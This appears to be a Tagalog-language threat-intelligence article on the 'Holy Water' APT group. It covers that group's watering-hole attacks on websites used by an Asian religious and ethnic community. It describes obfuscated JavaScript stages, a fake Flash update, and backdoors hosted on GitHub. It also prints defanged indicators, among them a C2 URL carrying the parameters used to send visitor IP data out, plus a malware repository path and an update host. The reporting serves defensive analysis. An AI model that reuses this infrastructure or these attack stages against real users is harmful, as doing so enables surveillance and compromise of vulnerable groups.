Holy Water APT
Ang Holy Water APT ay ang pangalang ibinigay sa isang grupo ng mga cybercriminal na nagsagawa ng serye ng mga water-hole type na pag-atake laban sa isang relihiyon at etnikong grupo sa Asia. Ang TTP (Tactics, Techniques and Procedures) ng partikular na pag-atakeng ito ay hindi maiugnay sa alinman sa mga kilalang ATP (Advanced Persistent Threat) na aktor, na humantong sa mga mananaliksik sa konklusyon na ito ay isang bagong cybercriminal group na nagpapakita ng mga katangian ng isang maliit at nababaluktot na pangkat ng mga hacker.
Upang magsagawa ng water-hole attack, tinatarget ng mga kriminal ang ilang website na madalas na binibisita ng mga itinalagang target. Ang mga site ay maaaring pag-aari ng mga organisasyon, kawanggawa o maimpluwensyang indibidwal na kabilang sa target na grupo. Ang lahat ng mga website na nakompromiso ng Holy Water ay na-host sa parehong server at may kasamang relihiyosong personalidad, kawanggawa, boluntaryong programa sa serbisyo, at isang patas na organisasyon sa kalakalan, bukod sa iba pa.
Kasama sa Pag-atake ang Maraming Yugto
Sa pagbisita sa isang nakompromisong website, ang user ay papasok sa unang yugto ng pag-atake na binubuo ng isang sirang JavaScript na pinangalanang (script|jquery)-css.js at na-obfuscate sa Sojson, isang Chinese-based na serbisyo sa Web. Ang tungkulin ng script na ito ay upang matukoy kung ang user ay isang wastong target at upang gawin ito ang payload ay magsisimulang mag-scrap ng data sa bisita at ipadala ito sa isang panlabas na server sa loginwebmailnic.dynssl[.]com sa pamamagitan ng mga kahilingan sa HTTP GET:
https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=
Ang tugon mula sa server ay nagbabalik ng totoo o maling resulta, at kung ang halaga ay totoo, ang susunod na yugto ng pag-atake ay ma-trigger; kung hindi, walang mangyayari.
Sa ikalawang hakbang, isang JavaScript na pinangalanang (script|jquery)-file.js, na, muli, na-obfuscate sa parehong paraan. Gayunpaman, sa pagkakataong ito ang mga hacker ay gumamit ng Sojson v5 sa halip na v4. Upang mahawahan ang gumagamit, hindi sinasamantala ng Holy Water APT ang anumang mga kahinaan o kahinaan ng software. Sa halip, isang pop-up window na nag-aalok ng pag-update ng Flash player ay nabuo at ang potensyal na biktima ay kailangang sumang-ayon na i-download ang file.
Na-host sa GitHub ang Arsenal of Malware Tools ng Holy Water APT
Kung pinapayagan ng user na magpatuloy ang pekeng pag-update ng Flash, kumokonekta ito sa isang hindi na aktibong repositoryo ng GitHub na matatagpuan sa github.com/AdobeFlash32/FlashUpdate . Apat na magkakaibang hanay ng mga tool ang na-store sa lokasyong iyon - isang installer package, isang backdoor malware na pinangalanan ng mga mananaliksik na Godlike12 , at dalawang bersyon ng isang open-source na Python backdoor na kilala bilang Stitch , na binago ng mga hacker na may pinalawak na functionality. Ang update package ay isang NSIS installer na nag-drop ng isang lehitimong Windows Flash Player installer at isang stager tool na ginagamit upang i-load ang aktwal na payload. Ang Godlike12 backdoor ay nakasulat sa wikang Go at ginagamit para magpatupad ng channel ng Google Drive sa mga server ng Command and Control (C&C, C2). Tulad ng para sa mga variant ng Stitch backdoor, bilang karagdagan sa karaniwang mga aktibidad sa backdoor tulad ng pagkolekta ng impormasyon at password, pag-log ng aktibidad, pag-download ng file, atbp., idinagdag ng grupong Holy Water ang kakayahang mag-download ng isang lehitimong programa sa Pag-install ng Adobe Flash, upang awtomatikong mag-update mismo mula sa ubntrooters.serveuser.com at makamit ang pagtitiyaga sa pamamagitan ng paggamit ng mga nakaiskedyul na gawain.
